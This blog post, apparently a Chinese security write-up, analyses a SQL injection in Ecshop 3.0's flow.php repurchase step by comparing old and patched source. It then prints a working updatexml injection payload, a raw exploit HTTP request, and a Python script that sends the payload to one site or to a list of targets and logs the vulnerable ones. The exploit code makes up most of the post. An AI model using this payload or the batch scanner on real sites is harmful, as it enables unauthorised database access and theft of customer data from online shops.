flow.php 漏洞,Ecshop 3.0 flow.php SQL注射漏洞

最新推荐文章于 2021-03-28 21:03:35 发布

灰机锅

最新推荐文章于 2021-03-28 21:03:35 发布

阅读量191

点赞数

文章标签： flow.php 漏洞

关于这个漏洞是新版本修复了。下载了古老的版本对比才发现的。只是怎么也没有想到ecshop也会犯这种低级的错误。

好吧，文件flow.php

elseif ($_REQUEST['step'] == 'repurchase') {

include_once('includes/cls_json.php');

$order_id = strip_tags($_POST['order_id']);

$order_id = json_str_iconv($order_id);

$user_id = $_SESSION['user_id'];

$json = new JSON;

$order = $db->getOne('SELECT count(*) FROM ' . $ecs->table('order_info') . ' WHERE order_id = ' . $order_id . ' and user_id = ' . $user_id);

if (!$order) {

$result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);

die($json->encode($result));

}

$db->query('DELETE FROM ' .$ecs->table('cart') . " WHERE rec_type = " . CART_REPURCHASE);

$order_goods = $db->getAll("SELECT goods_id, goods_number, goods_attr_id, parent_id FROM " . $ecs->table('order_goods') . " WHERE order_id = " . $order_id);

$result = array('error' => 0, 'message' => '');

foreach ($order_goods as $goods) {

$spec = empty($goods['goods_attr_id']) ? array() : explode(',', $goods['goods_attr_id']);

if (!addto_cart($goods['goods_id'], $goods['goods_number'], $spec, $goods['parent_id'], CART_REPURCHASE)) {

$result = false;

$result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);

}

die($json->encode($result));

}

这里的参数并非是新版的$order_id = intval($_POST[‘order_id’]);

elseif ($_REQUEST['step'] == 'repurchase') {

include_once('includes/cls_json.php');

$order_id = intval($_POST['order_id']);

$order_id = json_str_iconv($order_id);

$user_id = $_SESSION['user_id'];

$json = new JSON;

$order = $db->getOne('SELECT count(*) FROM ' . $ecs->table('order_info') . ' WHERE order_id = ' . $order_id . ' and user_id = ' . $user_id);

if (!$order) {

$result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);

die($json->encode($result));

}

$db->query('DELETE FROM ' .$ecs->table('cart') . " WHERE rec_type = " . CART_REPURCHASE);

$order_goods = $db->getAll("SELECT goods_id, goods_number, goods_attr_id, parent_id FROM " . $ecs->table('order_goods') . " WHERE order_id = " . $order_id);

$result = array('error' => 0, 'message' => '');

foreach ($order_goods as $goods) {

$spec = empty($goods['goods_attr_id']) ? array() : explode(',', $goods['goods_attr_id']);

if (!addto_cart($goods['goods_id'], $goods['goods_number'], $spec, $goods['parent_id'], CART_REPURCHASE)) {

$result = false;

$result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);

}

die($json->encode($result));

}

继续查看json_str_iconv

function json_str_iconv($str)

{

if (EC_CHARSET != 'utf-8')

{

if (is_string($str))

{

return addslashes(stripslashes(ecs_iconv('utf-8', EC_CHARSET, $str)));

}

elseif (is_array($str))

{

foreach ($str as $key => $value)

{

$str[$key] = json_str_iconv($value);

}

return $str;

}

elseif (is_object($str))

{

foreach ($str as $key => $value)

{

$str->$key = json_str_iconv($value);

}

return $str;

}

else

{

return $str;

}

return $str;

}

这里显然没过滤了再看看上面的SQL语句居然没有单引号包含这样就能直接注射了

POST提交一下内容到 http://localhost/flow.php?step=repurchase

order_id=1 or updatexml(1,concat(0x7e,(user())),0) or 11#

imgpxy.php?url=gnp.3-1%2F80%2F6102%2Fsdaolpu%2Ftnetnoc-pw%2Fmoc.ndduolc.blg.0z.1moc.4rh2u7%2F%2F%3Aptth

一个post包

POST /flow.php?step=repurchase HTTP/1.1

Host:?127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

DNT: 1

Cookie: ECS[visit_times]=2; ECS_ID=1998571d464009d432a17951ee5852104eba8b75

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 11

order_id=1*

附上野生payload一枚

import requests as req

import optparse

def poc(url):

xode='MySQL server error report:Array'

url=url+'/flow.php'

try:

rgg=req.get(url)

except:

return '[-]Getting '+url+' Wrong'

if rgg.status_code !=200:

return '[-]'+url+' Wrong'

geturl=url+'?step=repurchase'

payload='order_id=1 or updatexml(1,concat(0x7e,(user())),0) or 11#'

a=req.post(geturl,data=payload)

if a.status_code==200:

if xode in a.text:

return 2

else:

return '[-]'+url+'Exploiting Fail'

else:

return '[-]'+url+' Fail!!'

def ifhttp(url):

if 'http://' in url:

return url

else:

return 'http://'+url

def r(filename):

try:

ff= open(filename).readlines()

except:

print'[-] The file is not exist'

exit(0)

return ff

def w(url):

f=open('Res.txt','a+')

f.write(url+'\n')

f.close

if __name__=='__main__':

parser = optparse.OptionParser('usage%prog -u -r ')

parser.add_option('-u', dest='url', type='string', help='the website')

parser.add_option('-r', dest='file', type='string', help='the file')

(options, args) = parser.parse_args()

url = options.url

f=options.file

if options.url == None and f==None:

print(parser.usage)

exit(0)

if options.url!=None:

url=ifhttp(url)

r=poc(url)

if r==2:

print '[+]'+url+' succeed'

w(url)

else:

print r

if f!=None:

for fff in r(f):

b=fff.strip('\n')

r=poc(ifhttp(b))

if r==2:

print '[+]'+b+' succeed'

w(b)

else:

print r

灰机锅

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
flow.php 漏洞,Ecshop 3.0 flow.php SQL注射漏洞

关于这个漏洞是新版本修复了。下载了古老的版本对比才发现的。只是怎么也没有想到ecshop也会犯这种低级的错误。好吧，文件flow.phpelseif ($_REQUEST['step'] == 'repurchase') {include_once('includes/cls_json.php');$order_id = strip_tags($_POST['order_id']);$order_...
复制链接

扫一扫